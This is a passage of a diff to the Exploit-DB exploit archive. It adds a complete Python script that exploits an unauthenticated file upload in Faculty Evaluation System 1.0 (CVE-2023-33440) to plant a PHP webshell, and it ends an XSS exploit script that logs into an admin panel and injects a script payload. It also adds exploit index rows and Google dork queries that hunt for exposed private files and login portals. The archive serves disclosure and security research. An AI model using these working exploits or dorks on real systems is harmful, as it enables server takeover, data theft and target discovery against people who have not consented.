    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Referer': 'http://localhost/osghs/admin/login.php',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9',
    'Connection': 'close',
    'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Sec-Fetch-Dest': 'document'
 }
 response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials)
 if response.status_code == 200:
    location = re.findall(r'document.location =\'(.*?)\'',response.text)
    if location:
        print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET)
        print(Fore.GREEN + "> Popup:"+ Fore.RESET,location )
    else:
        print(Fore.GREEN + "> document.location not found"+ Fore.RESET)
 else:
    print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET)
 print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
 print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter  [**]" + Fore.RESET)
 # NAVIGATING TO ADMIN PROFILE SECTION  TO UPDATE ADMIN PROFILE
 # INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER
 Website_url= "http://localhost/osghs/admin/admin-profile.php"   # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE
 # FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD
 # FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""
 payload = {
    "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>",      # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE
    "username": "admin",                                                      # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE
    "mobilenumber": "8979555558",
    "email": "admin@gmail.com",
    "submit": "",
 }
 # SENDING THE RESPONSE WITH POST REQUEST
 response = requests.post(Website_url, headers=headers, data=payload)
 print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
 # CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX
 if response.status_code == 200:
    scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text)
    print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)
    print(Fore.GREEN+">"+Fore.RESET,scripts)
 exploit.py
 Displaying exploit.py.
--- a/exploits/php/webapps/51495.py
+++ b/exploits/php/webapps/51495.py
@ -0,0 +1,115 @@
 # Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload
 # Date: 5/29/2023
 # Author: Alex Gan
 # Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
 # Version: 1.0
 # Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6
 # CVE: CVE-2023-33440
 # References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440
 #			  https://www.exploit-db.com/exploits/49320
 #	          https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system
 #
 #!/usr/bin/env python3
 import os
 import sys
 import requests
 import argparse
 from bs4 import BeautifulSoup
 from urllib.parse import urlparse
 from requests.exceptions import ConnectionError, Timeout
 def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', type=str, help='URL')
    parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
    return parser.parse_args()
 def get_user_input(args):
    if not (args.url):
        args.url = input('Use the -u argument or Enter URL:')
    if not (args.payload):
        args.payload = input('Use the -p argument or Enter file path PHP webshell: ')
    return args.url, args.payload
 def check_input_url(url):
    parsed_url = urlparse(url)
    if not parsed_url.scheme:
        url = 'http://' + url
    if parsed_url.path.endswith('/'):
        url = url.rstrip('/')
    return url
 def check_host_availability(url):
    try:
        response = requests.head(url=url + '/login.php')
        if response.status_code == 200:
            print("[+] Host is accessible")
        else:
            print("[-] Host is not accessible")
            print("    Status code:", response.status_code)
            sys.exit()
    except (ConnectionError, Timeout) as e:
        print("[-] Host is not accessible")
        sys.exit()
    except requests.exceptions.RequestException as e:
        print("[-] Error:", e)
        sys.exit()
 def make_request(url, method, files=None):
    if method == 'GET':
        response = requests.get(url)
    elif method == 'POST':
        response = requests.post(url, files=files)
    else:
        raise ValueError(f'Invalid HTTP method: {method}')
    if response.status_code == 200:
        print('[+] Request successful')
        return response.text
    else:
        print(f'[-] Error {response.status_code}: {response.text}')
        return None
 def find_file(response_get, filename, find_url):
    soup = BeautifulSoup(response_get, 'html.parser')
    links = soup.find_all('a')
    found_files = []
    for link in links:
        file_upl = link.get('href')
        if file_upl.endswith(filename):
            found_files.append(file_upl)
    if found_files:
        print('    File found:')
        for file in found_files:
            print('[*] ' + file)
        print('    Full URL of your file:')
        for file_url in found_files:
            print('[*] ' + find_url + file_url)
    else:
        print('[-] File not found')
 def main():
    args = get_args()
    url, payload = get_user_input(args)
    url = check_input_url(url)
    check_host_availability(url)
    post_url = url + "/ajax.php?action=save_user"
    get_url = url + "/assets/uploads/"
    filename = os.path.basename(payload)
    payload_file = [('img',(filename,open(args.payload,'rb'),'application/octet-stream'))]
    print("    Loading payload file")
    make_request(post_url,  'POST', files=payload_file)
    print("    Listing the uploads directory")
    response_get = make_request(get_url, 'GET')
    print("    Finding the downloaded payload file")
    find_file(response_get, filename, get_url)
 if __name__ == "__main__":
    main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -2900,6 +2900,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
 51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,,
 51498,exploits/go/webapps/51498.txt,"Pydio Cells 4.1.2 - Server-Side Request Forgery",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32750,,,,,
 51496,exploits/go/webapps/51496.txt,"Pydio Cells 4.1.2 - Unauthorised Role Assignments",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32749,,,,,
 7060,exploits/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,dos,hardware,,2008-11-07,,1,OSVDB-60243;CVE-2008-6605;OSVDB-49835,,,,,
 2246,exploits/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,dos,hardware,,2006-08-21,,1,OSVDB-28171;CVE-2009-3962;CVE-2006-4523,,,,,
 10182,exploits/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,dos,hardware,,2009-10-28,,1,,,,,,http://secunia.com/advisories/21583
@ -10761,6 +10764,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31050,exploits/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",remote,multiple,,2008-01-28,2014-01-20,1,CVE-2008-0387;OSVDB-43187,,,,,https://www.securityfocus.com/bid/27403/info
 29820,exploits/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",remote,multiple,,2007-03-06,2013-11-26,1,CVE-2007-1947;OSVDB-34122,,,,,https://www.securityfocus.com/bid/23349/info
 37851,exploits/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",remote,multiple,,2015-08-19,2015-08-19,1,CVE-2015-5116,,,,,https://code.google.com/p/google-security-research/issues/detail?id=354&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
 51493,exploits/multiple/remote/51493.rb,"Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)",2023-05-31,"Ege Balci",remote,multiple,,2023-05-31,2023-05-31,0,CVE-2018-8065,,,,,
 34500,exploits/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,remote,multiple,,2010-08-19,2014-09-01,1,CVE-2010-3202;OSVDB-67969,,,,,https://www.securityfocus.com/bid/42556/info
 19223,exploits/multiple/remote/19223.txt,"FloosieTek FTGate 2.1 - Web File Access",1999-05-25,Marc,remote,multiple,,1999-05-25,2012-06-16,1,CVE-1999-0887;OSVDB-1137,,,,,https://www.securityfocus.com/bid/280/info
 28209,exploits/multiple/remote/28209.txt,"FLV Players 8 - 'player.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28643,,,,,https://www.securityfocus.com/bid/18954/info
@ -11940,6 +11944,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49830,exploits/multiple/webapps/49830.js,"Moeditor 0.2.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
 49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,,2020-12-03,2020-12-03,0,,,,,,
 49582,exploits/multiple/webapps/49582.txt,"Monica 2.19.1 - 'last_name' Stored XSS",2021-02-23,BouSalman,webapps,multiple,,2021-02-23,2021-02-23,0,CVE-2021-27370,,,,,
 51499,exploits/multiple/webapps/51499.txt,"MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)",2023-05-31,tmrswrr,webapps,multiple,,2023-05-31,2023-05-31,0,,,,,,
 50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",2021-11-12,"Shain Lakin",webapps,multiple,,2021-11-12,2021-11-12,0,,,,,,
 9898,exploits/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Path Disclosure",2009-10-29,"Vladimir Vorontsov",webapps,multiple,,2009-10-28,,1,OSVDB-59579,,,,,
 50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",2021-10-19,"RedTeam Pentesting GmbH",webapps,multiple,,2021-10-19,2021-10-19,0,CVE-2021-42566;CVE-2021-42565,,,,,
@ -18154,6 +18159,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45813,exploits/php/webapps/45813.txt,"Facturation System 1.0 - 'modid' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comsimple-invoice-master.zip,
 12521,exploits/php/webapps/12521.txt,"Factux - Local File Inclusion",2010-05-06,ALTBTA,webapps,php,,2010-05-05,,0,OSVDB-64382;OSVDB-64381;OSVDB-64380;OSVDB-64379;OSVDB-64378;OSVDB-64377;OSVDB-64376;OSVDB-64375,,,,,
 49320,exploits/php/webapps/49320.txt,"Faculty Evaluation System 1.0 - Stored XSS",2020-12-22,"Vijay Sachdeva",webapps,php,,2020-12-22,2020-12-22,0,,,,,,
 51495,exploits/php/webapps/51495.py,"Faculty Evaluation System 1.0 - Unauthenticated File Upload",2023-05-31,URGAN,webapps,php,,2023-05-31,2023-05-31,0,CVE-2023-33440,,,,,
 10230,exploits/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Arbitrary File Upload",2009-11-25,DigitALL,webapps,php,,2009-11-24,,1,,,,,,
 43072,exploits/php/webapps/43072.txt,"Fake Magazine Cover Script - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15987,,,,,
 4712,exploits/php/webapps/4712.txt,"falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting",2007-12-10,MhZ91,webapps,php,,2007-12-09,2016-10-20,1,OSVDB-40988;CVE-2007-6490;OSVDB-40987;OSVDB-40986;CVE-2007-6489;OSVDB-40985;CVE-2007-6488,,,,http://www.exploit-db.comfalcon143.tar.gz,
@ -24727,6 +24733,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48419,exploits/php/webapps/48419.txt,"Online Scheduling System 1.0 - 'username' SQL Injection",2020-05-05,"Saurav Shukla",webapps,php,,2020-05-05,2020-05-05,0,,,,,,
 48409,exploits/php/webapps/48409.txt,"Online Scheduling System 1.0 - Authentication Bypass",2020-05-01,boku,webapps,php,,2020-05-01,2020-05-01,0,,,,,,
 48403,exploits/php/webapps/48403.txt,"Online Scheduling System 1.0 - Persistent Cross-Site Scripting",2020-05-01,boku,webapps,php,,2020-05-01,2020-05-01,0,,,,,,
 51494,exploits/php/webapps/51494.py,"Online Security Guards Hiring System 1.0 - Reflected XSS",2023-05-31,"AFFAN AHMED",webapps,php,,2023-05-31,2023-05-31,0,CVE-2023-0527,,,,,
 48819,exploits/php/webapps/48819.txt,"Online Shop Project 1.0 - 'p' SQL Injection",2020-09-21,Augkim,webapps,php,,2020-09-21,2020-09-21,0,,,,,,
 48771,exploits/php/webapps/48771.txt,"Online Shopping Alphaware 1.0 - 'id' SQL Injection",2020-08-28,"Moaaz Taha",webapps,php,,2020-08-28,2020-08-28,0,,,,,,
 48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php,,2020-07-30,2020-07-30,0,,,,,,
@ -24736,7 +24743,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,,
 50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,,
 48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,,
-51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
+51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-05-31,1,,,,,,
 35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info
 44719,exploits/php/webapps/44719.txt,"Online Store System CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,,
 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,,2020-06-23,2020-06-23,0,,,,,,
@ -28747,6 +28754,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,,2020-12-11,2021-02-18,0,CVE-2020-11819,,,,,
 48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,,2020-09-02,2021-02-18,0,CVE-2020-11819,,,,,
 51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 51490,exploits/php/webapps/51490.txt,"Rukovoditel 3.3.1 - CSV injection",2023-05-31,"Mirabbas Ağalarov",webapps,php,,2023-05-31,2023-05-31,0,,,,,,
 51322,exploits/php/webapps/51322.txt,"Rukovoditel 3.3.1 - Remote Code Execution (RCE)",2023-04-07,"Mirabbas Ağalarov",webapps,php,,2023-04-07,2023-04-07,0,,,,,,
 46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
 45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip,
@ -29034,6 +29042,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7111,exploits/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,webapps,php,,2008-11-12,,1,OSVDB-49960;CVE-2008-6944;CVE-2008-6943;CVE-2008-6942,,,,,
 7110,exploits/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,webapps,php,,2008-11-12,,1,OSVDB-49960;CVE-2008-6944;CVE-2008-6943;CVE-2008-6942,,,,,
 7112,exploits/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal - Arbitrary File Upload",2008-11-13,ZoRLu,webapps,php,,2008-11-12,,1,OSVDB-49960;CVE-2008-6944;CVE-2008-6943;CVE-2008-6942,,,,,
 51491,exploits/php/webapps/51491.txt,"SCRMS 2023-05-27 1.0 - Multiple SQL Injection",2023-05-31,nu11secur1ty,webapps,php,,2023-05-31,2023-05-31,0,,,,,,
 37548,exploits/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 - Arbitrary File Upload",2012-07-30,"Mario Ceballos",webapps,php,,2012-07-30,2015-07-10,1,CVE-2012-2627;OSVDB-84319,,,,,https://www.securityfocus.com/bid/54726/info
 37547,exploits/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",webapps,php,,2012-07-30,2015-07-10,1,CVE-2012-3848;OSVDB-84321,,,,,https://www.securityfocus.com/bid/54725/info
 27724,exploits/php/webapps/27724.txt,"Scry Gallery - Directory Traversal",2006-04-21,"Morocco Security Team",webapps,php,,2006-04-21,2013-08-20,1,CVE-2006-1995;OSVDB-24889,,,,,https://www.securityfocus.com/bid/17649/info
@ -29125,7 +29134,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,,
 45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip,
 10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,,
-51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2023-05-24,0,,,,,,
+51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2023-05-31,1,CVE-2023-2769,,,,,
 4089,exploits/php/webapps/4089.pl,"SerWeb 0.9.4 - 'load_lang.php' Remote File Inclusion",2007-06-21,Kw3[R]Ln,webapps,php,,2007-06-20,2016-10-05,1,OSVDB-36324;CVE-2007-3358,,,,http://www.exploit-db.comserweb-0.9.4.tar.gz,
 4696,exploits/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities",2007-12-06,GoLd_M,webapps,php,,2007-12-05,,1,OSVDB-39220;CVE-2007-6290;OSVDB-39219;CVE-2007-6289;OSVDB-39218;OSVDB-39217,,,,,
 9284,exploits/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions",2009-07-27,GoLd_M,webapps,php,,2009-07-26,,1,,,,,,
@ -31084,6 +31093,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80,2016-02-04,2016-02-04,1,,,,,http://www.exploit-db.comulicms-9.8.1-snowfall-full.zip,
 51434,exploits/php/webapps/51434.txt,"Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 51435,exploits/php/webapps/51435.txt,"Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-09,1,,,,,,
 51433,exploits/php/webapps/51433.py,"Ulicms-2023.1-sniffing-vicuna - Privilege escalation",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-31,0,,,,,,
 11048,exploits/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - 'ladder.php' SQL Injection",2010-01-07,Sora,webapps,php,,2010-01-06,,1,,,,,,
 11385,exploits/php/webapps/11385.txt,"ULoki Community Forum 2.1 - 'usercp.php' Cross-Site Scripting",2010-02-10,"Sioma Labs",webapps,php,,2010-02-09,,1,,,,,,
 34888,exploits/php/webapps/34888.txt,"UloKI PHP Forum 2.1 - 'search.php' Cross-Site Scripting",2009-08-19,Moudi,webapps,php,,2009-08-19,2016-10-10,1,CVE-2009-3202;OSVDB-57176,,,,,https://www.securityfocus.com/bid/44273/info
@ -31142,6 +31152,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50022,exploits/php/webapps/50022.txt,"Unified Office Total Connect Now 1.0 - 'data' SQL Injection",2021-06-17,"Ajaikumar Nadar",webapps,php,,2021-06-17,2021-06-17,0,,,,,,
 3106,exploits/php/webapps/3106.txt,"uniForum 4 - 'wbsearch.aspx' SQL Injection",2007-01-09,ajann,webapps,php,,2007-01-08,,1,OSVDB-32927;CVE-2007-0226,,,,,
 37216,exploits/php/webapps/37216.txt,"Unijimpe Captcha - 'captchademo.php' Cross-Site Scripting",2012-05-16,"Daniel Godoy",webapps,php,,2012-05-16,2015-06-06,1,CVE-2012-2914;OSVDB-82267,,,,,https://www.securityfocus.com/bid/53585/info
 51492,exploits/php/webapps/51492.txt,"unilogies/bumsys v1.0.3 beta - Unrestricted File Upload",2023-05-31,"AFFAN AHMED",webapps,php,,2023-05-31,2023-05-31,0,CVE-2023-0455,,,,,
 29504,exploits/php/webapps/29504.txt,"Unique Ads - 'Banner.php' SQL Injection",2007-01-22,Linux_Drox,webapps,php,,2007-01-22,2013-11-08,1,,,,,,https://www.securityfocus.com/bid/22164/info
 48166,exploits/php/webapps/48166.txt,"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read",2020-03-04,NgoAnhDuc,webapps,php,,2020-03-04,2020-03-04,0,,,,,,
 46389,exploits/php/webapps/46389.py,"UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload",2019-02-15,"Mohammad Danish",webapps,php,80,2019-02-15,2019-02-15,0,,,,,http://www.exploit-db.comlaravel-filemanager-2.0.0-alpha7.tar.gz,
--- a/ghdb.xml
+++ b/ghdb.xml
@ -33661,6 +33661,21 @@ Aamir Rehman
  <date>2018-02-14</date>
  <author>Aamir Rehman</author>
 </entry>
 <entry>
  <id>8200</id>
  <link>https://www.exploit-db.com/ghdb/8200</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>allintitle:&quot;macOS Server&quot; site:.edu</shortDescription>
  <textualDescription># Google Dork: allintitle:&quot;macOS Server&quot; site:.edu
 # Files Containing Juicy Info
 # Date:31/05/2023
 # Exploit Author: Thomas Heverin</textualDescription>
  <query>allintitle:&quot;macOS Server&quot; site:.edu</query>
  <querystring>https://www.google.com/search?q=allintitle:&quot;macOS Server&quot; site:.edu</querystring>
  <edb></edb>
  <date>2023-05-31</date>
  <author>Thomas Heverin</author>
 </entry>
 <entry>
  <id>8097</id>
  <link>https://www.exploit-db.com/ghdb/8097</link>
@ -44667,6 +44682,22 @@ Author: Abhi Chitkara
  <date>2022-06-17</date>
  <author>Danish Eqbal</author>
 </entry>
 <entry>
  <id>8198</id>
  <link>https://www.exploit-db.com/ghdb/8198</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intitle:&quot;index of&quot; &quot;private.properties&quot;</shortDescription>
  <textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;private.properties&quot;
 # Files Containing Juicy Info
 # Date:31/05/2023
 # Exploit Author: Praharsh Kumar Singh
 </textualDescription>
  <query>intitle:&quot;index of&quot; &quot;private.properties&quot;</query>
  <querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;private.properties&quot;</querystring>
  <edb></edb>
  <date>2023-05-31</date>
  <author>Praharsh Kumar Singh</author>
 </entry>
 <entry>
  <id>7957</id>
  <link>https://www.exploit-db.com/ghdb/7957</link>
@ -44713,6 +44744,22 @@ Author: Abhi Chitkara
  <date>2021-09-24</date>
  <author>J. Igor Melo</author>
 </entry>
 <entry>
  <id>8197</id>
  <link>https://www.exploit-db.com/ghdb/8197</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intitle:&quot;index of&quot; &quot;profiler&quot;</shortDescription>
  <textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;profiler&quot;
 # Files Containing Juicy Info
 # Date:31/05/2023
 # Exploit Author: Praharsh Kumar Singh
 </textualDescription>
  <query>intitle:&quot;index of&quot; &quot;profiler&quot;</query>
  <querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;profiler&quot;</querystring>
  <edb></edb>
  <date>2023-05-31</date>
  <author>Praharsh Kumar Singh</author>
 </entry>
 <entry>
  <id>7710</id>
  <link>https://www.exploit-db.com/ghdb/7710</link>
@ -47800,6 +47847,21 @@ Sachin
  <date>2020-07-07</date>
  <author>Sachin Kattimani</author>
 </entry>
 <entry>
  <id>8204</id>
  <link>https://www.exploit-db.com/ghdb/8204</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intitle:&quot;SCM Manager&quot; intext:1.60</shortDescription>
  <textualDescription># Google Dork: intitle:&quot;SCM Manager&quot; intext:1.60
 # Files Containing Juicy Info
 # Date:31/05/2023
 # Exploit Author: Alexandros Pappas</textualDescription>
  <query>intitle:&quot;SCM Manager&quot; intext:1.60</query>
  <querystring>https://www.google.com/search?q=intitle:&quot;SCM Manager&quot; intext:1.60</querystring>
  <edb></edb>
  <date>2023-05-31</date>
  <author>Alexandros Pappas</author>
 </entry>
 <entry>
  <id>8190</id>
  <link>https://www.exploit-db.com/ghdb/8190</link>
@ -53626,6 +53688,21 @@ passwords..etc</textualDescription>
  <date>2013-08-08</date>
  <author>anonymous</author>
 </entry>
 <entry>
  <id>8203</id>
  <link>https://www.exploit-db.com/ghdb/8203</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>inurl:wp-content/uploads/sites</shortDescription>
  <textualDescription># Google Dork: inurl:wp-content/uploads/sites
 # Files Containing Juicy Info
 # Date:31/05/2023
 # Exploit Author: Stuart Steenberg</textualDescription>
  <query>inurl:wp-content/uploads/sites</query>
  <querystring>https://www.google.com/search?q=inurl:wp-content/uploads/sites</querystring>
  <edb></edb>
  <date>2023-05-31</date>
  <author>Stuart Steenberg</author>
 </entry>
 <entry>
  <id>8187</id>
  <link>https://www.exploit-db.com/ghdb/8187</link>
@ -88122,6 +88199,36 @@ default: admin // adminadmin</textualDescription>
  <date>2021-11-12</date>
  <author>Naveen Venugopal</author>
 </entry>
 <entry>
  <id>8202</id>
  <link>https://www.exploit-db.com/ghdb/8202</link>
  <category>Pages Containing Login Portals</category>
